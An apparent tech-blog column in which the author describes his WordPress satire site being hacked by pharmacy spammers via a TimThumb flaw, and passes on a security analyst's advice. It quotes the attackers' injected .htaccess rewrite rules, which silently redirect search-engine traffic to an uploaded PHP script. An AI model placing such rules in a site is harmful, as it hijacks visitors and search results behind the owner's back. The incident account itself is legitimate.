Hacked and mangled -- yet again

For the second time in two years my WordPress site was hacked, this time by Viagra spammers. Here are a few of the hard lessons I learned.

The price of living on the InterWebs is that eventually you’re going to get hacked. And the longer you stay on the InterWebs, the more likely you’ll get hacked again. So it is with eSarcasm, the not-quite-award-winning satirical site I co-author with my partner in juvenility, JR Raphael.

A few weeks ago I was searching for something on eSarcasm and discovered that Google’s search results looked extremely disconcerting. The URLs were correct, but instead of the usual snarky headlines, two sentence excerpts, and page previews, Google had apparently substituted text like "Buy real viagra - Approved Online Pharmacy: always 10% off for all reorders, free samples for all orders, 100% quality, low prices, 24/7 support..."

It looked something like this:

esarcasm viagra hack cropped 600p.png

When did eSarcasm become an online pharmacy, exactly? And if we are hawking bogus Viagra, shouldn’t we be making more money?

Clicking through the search results produced either an error message or a redirect to a pharmacy site, even though plugging the correct URL into the browser produced the page that was supposed to be there. The redirect only happened from within Google results. 

It turns out that some Viagra spammer/hackers did quite a number on us. For one thing, they gained access to our WordPress directories and uploaded several bogus PHP files. They also added the following bits of extra code to our .htaccess file:

RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]

RewriteCond %{HTTP_REFERER} (google|aol|yahoo)RewriteBase /RewriteCond %{THE_REQUEST} /RewriteCond %{REQUEST_URI} !/conf\.phpRewriteRule .+ cgi-bin/conf.php [L]

That’s what poleaxed our Google search results. Digging deeper, I turned up other folks who’d gotten nailed in similar ways, including a former tech reporter for the New York Times and the co-founder of one of the world’s most successful social networks. At least we were in good company.

Regular readers of TY4NS will remember this is the not the first time eSarcasm was hacked. Back in September 2010 the site fell victim to a vulnerability that allowed bad guys to serve up ‘malvertising’ – bogus ads that installed malware on visitors’ machines. The flaw was in OpenX, a plug in we used for rotating banner ads. OpenX had patched that hole shortly after it was discovered, but didn’t deign to notify us about the bug or the fix, so we got creamed.

Fortunately for us, our Web host Doreo quickly identified the cause and fixed that vulnerability within a few hours. This time the cause and the fix were a little harder to suss out.

We ended up paying Code Garage to scan our site and remove the malicious code. They pointed the finger at TimThumb, a WordPress utility that automatically produces thumbnail images for site landing pages. Last August, a zero-day vulnerability affected TimThumb that allowed hackers to execute their PHP code on any site that was running it.  As it turns out, the WordPress theme we bought for the site employs pieces of TimThumb code – including the flaws that were exploited.

Now we have to wait for the spammy search results to evaporate from Google’s cache before everything returns to normal.

Why did hackers do this? Odds are eSarcasm was simply part of a bundle of redirected traffic that was bartered on underground exchanges for a few pennies per page view, says Paul Henry, security and forensics analyst for Lumension, an endpoint management and security firm. 

Even if you religiously update your WordPress installation (and we’re generally pretty good about that) you may be vulnerable thanks to some easily hackable plug in, says Henry.

“My best recommendation for keeping your site secure is to gain tight control over any extensions for your WordPress installation and disable any you don’t truly need,” he says. He also suggested hiring an outside firm to periodically scan the site and validate each page several times a day.

Henry said the hacking problem is so insidious and pervasive even well-known tech security pros have fallen victim, much to their embarrassment. I asked Henry if it had happened to him.

“To date I have not been embarrassed,” he says. “I’ve been lucky.”

Wish we could say the same.

Got a question about social media? TY4NS blogger Dan Tynan may have the answer (and if not, he’ll make something up). Visit his snarky, occasionally NSFW blog eSarcasm or follow him on Twitter: @tynan_on_tech. For the latest IT news, analysis and how-to’s, follow ITworld on Twitter and Facebook.

Top 10 Hot Internet of Things Startups
Join the discussion
Be the first to comment on this article. Our Commenting Policies